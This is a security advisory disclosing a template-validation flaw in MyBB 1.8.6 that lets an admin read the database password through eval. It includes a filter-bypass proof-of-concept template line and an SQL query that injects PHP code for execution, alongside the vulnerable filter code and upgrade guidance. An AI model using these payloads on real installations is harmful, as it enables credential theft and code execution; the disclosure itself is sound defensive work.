Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    MyBB 1.8.6
Fixed in:            1.8.7
Fixed Version Link:  http://resources.mybb.com/downloads/mybb_1807.zip
Vendor Website:      http://www.mybb.com/
Vulnerability Type:  Improper validation of data passed to eval
Remote Exploitable:  Yes
Reported to vendor:  01/29/2016
Disclosed to public: 09/15/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

MyBB is forum software written in PHP. In version 1.8.6, it improperly
validates templates that are passed to eval, allowing for the disclosure of the
database password. If the database is writable from remote, it may also lead to
code execution.

An admin account is required.

3. Details

Description

CVSS: Low 3.5 AV:N/AC:M/Au:S/C:P/I:N/A:N

MyBB allows an admin to edit templates. These templates can contain HTML, and
it is possible to read out the content of PHP variables as well as the
properties of objects. There are filters in place which should make it
impossible to call functions or to read out sensitive information such as
database credentials.

Templates are used as following:

eval('$variable = "'.$templates->get('templateName').'";');

$templates->get returns the template as saved in the database, with double
quotes and slashes escaped.

When saving a template, the template is passed to the check_template function
to check if it contains malicious content. The checks try to prevent the
reading of the database password as well as the calling of functions. This
means that none of the naive attempts to read out the database password - eg
$config['database']['password'], $config[database][password], or $config
["database"]["password"] - would work.

However, it is still possibly to read out the database password by setting the
value of an existing variable to "password" and using that variable when
reading out the password, thus bypassing the filter.

Proof of Concept

First, edit a template such as the usercp_profile_contact_fields_field template:
    http://localhost/mybb_1806/Upload/admin/index.php?module=style-templates&action=edit_template&title=usercp_profile_contact_fields_field&sid=1&expand=15

Add this line at the beginning:
    {$cfvalue}: {$config['database'][$cfvalue]}

Now, visit the profile:
    http://localhost/mybb_1806/Upload/usercp.php?action=profile

As any of the "Additional Contact Information" values, use "password" to read out the database password, 
    "hostname" to read out the hostname, and "username" to read out the user.

In case that the database is writable from remote, an attacker could now also
gain code execution, as check_template is applied when saving templates, not
when loading them. Example query:

UPDATE mybb_templates SET template="{${phpinfo()}}" WHERE title=
"usercp_profile_contact_fields_field";

Visiting the profile will execute the injected code.

Code

inc/config.php
    $config['database']['password'] = '[THE_DATABASE_PASSWORD]';

admin/inc/functions.php
    function check_template($template)
    {
      // Check to see if our database password is in the template
      if(preg_match("#database'?\\s*\]\\s*\[\\s*'?password#", $template))
      {
        return true;
      }

      // System calls via backtick
      if(preg_match('#\$\s*\{#', $template))
      {
        return true;
      }

      // Any other malicious acts?
      // Courtesy of ZiNgA BuRgA
      if(preg_match("~\\{\\$.+?\\}~s", preg_replace('~\\{\\$+[a-zA-Z_][a-zA-Z_0-9]*((?:-\\>|\\:\\:)\\$*[a-zA-Z_][a-zA-Z_0-9]*|\\[\s*\\$*([\'"]?)[a-zA-Z_ 0-9 ]+\\2\\]\s*)*\\}~', '', $template)))
      {
        return true;
      }

      return false;
    }

usercp.php (as one example)

  foreach(array('icq', 'aim', 'yahoo', 'skype', 'google') as $cfield)
  {
    $contact_fields[$cfield] = '';
    $csetting = 'allow'.$cfield.'field';
    if($mybb->settings[$csetting] == '')
    {
      continue;
    }

    if(!is_member($mybb->settings[$csetting]))
    {
      continue;
    }

    $cfieldsshow = true;

    $lang_string = 'contact_field_'.$cfield;
    $lang_string = $lang->{$lang_string};
    $cfvalue = htmlspecialchars_uni($user[$cfield]);

    eval('$contact_fields[$cfield] = "'.$templates->get('usercp_profile_contact_fields_field').'";');
  }
4. Solution

To mitigate this issue please upgrade at least to version 1.8.7:

http://resources.mybb.com/downloads/mybb_1807.zip

Please note that a newer version might already be available.

5. Report Timeline

01/29/2016 Informed Vendor about Issue
02/26/2016 Vendor requests more time
03/11/2016 Vendor releases fix
09/15/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/MyBB-186-Improper-validation-of-data-passed-to-eval-157.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-StraAe 54
10365 Berlin, Germany